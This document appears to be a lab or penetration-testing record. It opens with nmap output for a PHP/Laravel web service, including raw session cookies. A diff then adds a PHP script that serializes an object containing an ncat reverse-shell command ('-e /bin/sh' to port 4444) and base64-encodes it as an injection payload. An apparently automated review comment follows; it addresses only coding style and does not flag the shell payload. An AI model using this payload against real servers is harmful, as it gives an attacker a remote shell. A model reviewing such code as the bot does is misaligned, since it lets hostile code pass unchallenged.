| Set-Cookie: laravel_session=eyJpdiI6IjRCcndFZFVVY0QyaFUzUWY4cWs1cVE9PSIsInZhbHVlIjoiN3ErenpYUkJZRXZVMU1HZUpLY2tPNkd5VDk1Q3B4VktQSUhsSnZrYmdpZWMzTUVwWUlxbGJqWnBcL3lTcFg2RFl2RWxZMElxNkQ4ZENcL2VYTkNLUm5DUT09IiwibWFjIjoiYzUzMmJjYzM0MWNiODAyMzljZmMwMTExM2RhNTY4NGMyMTA2NjQ4MTAxZGQ1NDc0ZTE0Nj
| HTTPOptions:
| HTTP/1.0 200 OK
| Date: Fri, 16 Jan 2026 16:37:15 +0000
| Connection: close
| X-Powered-By: PHP/7.2.10
| Allow: GET,HEAD,POST
| Cache-Control: private, must-revalidate
| Date: Fri, 16 Jan 2026 16:37:15 GMT
| Content-Type: text/html; charset=UTF-8
| pragma: no-cache
|_ expires: -1
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8089-TCP:V=7.98%I=7%D=1/16%Time=696A693B%P=aarch64-unknown-linux-gn
SF:u%r(GetRequest,D59,"HTTP/1\.0\x20200\x20OK\r\nDate:\x20Fri,\x2016\x20Ja
SF:n\x202026\x2016:37:15\x20\+0000\r\nConnection:\x20close\r\nX-Powered-By
SF::\x20PHP/7\.2\.10\r\nCache-Control:\x20private,\x20must-revalidate\r\nD
SF:ate:\x20Fri,\x2016\x20Jan\x202026\x2016:37:15\x20GMT\r\nContent-Type:\x
SF:20text/html;\x20charset=UTF-8\r\npragma:\x20no-cache\r\nexpires:\x20-1\
SF:r\nSet-Cookie:\x20XSRF-TOKEN=eyJpdiI6IlFKTnFvQnJsY2tYRlY3SDlCQmZhXC9nPT
SF:0iLCJ2YWx1ZSI6Im5HRzJwM2pDNzN2eDQ5TUc4NVYxbnJ2OVpPRXQ1a1hJZGJ1MGt0NHYxV
SF:DdFUFhleUJyWHM3U09qTlJQMnEwem4xOTFnVjJwT2JlczBsQlVtWlRIMEpBPT0iLCJtYWMi
SF:OiJiODYzNDBlYTNjMjYzYjIyZGQzNTdiMGQ0OTA2YTBiMzk1OTQ1OTQzODZjOGFmMDkwOTA
SF:3Yjk0MmI5OGZlZjE1In0%3D;\x20expires=Fri,\x2016-Jan-2026\x2018:37:15\x20
SF:GMT;\x20Max-Age=7200;\x20path=/\r\nSet-Cookie:\x20laravel_session=eyJpd
SF:iI6IjRCcndFZFVVY0QyaFUzUWY4cWs1cVE9PSIsInZhbHVlIjoiN3ErenpYUkJZRXZVMU1H
SF:ZUpLY2tPNkd5VDk1Q3B4VktQSUhsSnZrYmdpZWMzTUVwWUlxbGJqWnBcL3lTcFg2RFl2RWx
SF:ZMElxNkQ4ZENcL2VYTkNLUm5DUT09IiwibWFjIjoiYzUzMmJjYzM0MWNiODAyMzljZmMwMT
SF:ExM2RhNTY4NGMyMTA2NjQ4MTAxZGQ1NDc0ZTE0Nj")%r(HTTPOptions,112,"HTTP/1\.0
SF:\x20200\x20OK\r\nDate:\x20Fri,\x2016\x20Jan\x202026\x2016:37:15\x20\+00
SF:00\r\nConnection:\x20close\r\nX-Powered-By:\x20PHP/7\.2\.10\r\nAllow:\x
SF:20GET,HEAD,POST\r\nCache-Control:\x20private,\x20must-revalidate\r\nDat
SF:e:\x20Fri,\x2016\x20Jan\x202026\x2016:37:15\x20GMT\r\nContent-Type:\x20
SF:text/html;\x20charset=UTF-8\r\npragma:\x20no-cache\r\nexpires:\x20-1\r\
SF:n\r\n")%r(FourOhFourRequest,6A7,"HTTP/1\.0\x20404\x20Not\x20Found\r\nDa
SF:te:\x20Fri,\x2016\x20Jan\x202026\x2016:37:24\x20\+0000\r\nConnection:\x
SF:20close\r\nX-Powered-By:\x20PHP/7\.2\.10\r\nCache-Control:\x20no-cache,
SF:\x20private\r\ndate:\x20Fri,\x2016\x20Jan\x202026\x2016:37:24\x20GMT\r\
SF:nContent-type:\x20text/html;\x20charset=UTF-8\r\n\r\n<!DOCTYPE\x20html>
SF:\n<html\x20lang=\"en\">\n\x20\x20\x20\x20<head>\n\x20\x20\x20\x20\x20\x
SF:20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20
SF:<meta\x20http-equiv=\"X-UA-Compatible\"\x20content=\"IE=edge\">\n\x20\x
SF:20\x20\x20\x20\x20\x20\x20<meta\x20name=\"viewport\"\x20content=\"width
SF:=device-width,\x20initial-scale=1\">\n\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0<title>Page\x20Not\x20Found</title>\n\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0<!--\x20Fonts\x20-->\n\x20\x20\x20\x20\x20\x20\x20\x20<link\x20href=\"
SF:https://fonts\.googleapis\.com/css\?family=Raleway:100,600\"\x20rel=\"s
SF:tylesheet\"\x20type=\"text/css\">\n\n\x20\x20\x20\x20\x20\x20\x20\x20<!
SF:--\x20Styles\x20-->\n\x20\x20\x20\x20\x20\x20\x20\x20<style>\n\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20html,\x20body\x20{\n\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20background-color:\x
SF:20#fff;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20color:\x20#636b6f;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20font-family:\x20'Raleway',\x20sans-serif;\n\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20font-weight:\x20100;
SF:\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20heigh
SF:t:\x20100vh;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20margin:\x200;\n\x20\x20\x20\x20\x20\x20\x20\x20\x20");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 3 hops
TRACEROUTE (using port 8089/tcp)
HOP RTT ADDRESS
1 41.81 ms 192.168.128.1
2 ...
3 43.83 ms 10.81.136.171
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan 16 17:37:33 2026 -- 1 IP address (1 host up) scanned in 29.84 seconds


@@ -0,0 +1,10 @@
<?php
class MaliciousUserData {
public $command = 'ncat -nv 192.168.138.181 4444 -e /bin/sh';
}
$maliciousUserData = new MaliciousUserData();
$serializedData = serialize($maliciousUserData);
$base64EncodedData = base64_encode($serializedData);
echo "Base64 Encoded Serialized Data: " . $base64EncodedData;
?>
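Review bot: The file ends with a closing `?>` tag; in a file that contains only PHP the tag is best omitted (PSR-12), since any whitespace after it is sent as output. The script also has no header comment saying which lab exercise the hard-coded `$command` value belongs to; a line such as `// Lab artefact for <EXERCISE_NAME>; address is lab-local` would make that clear to a later reader of the repository.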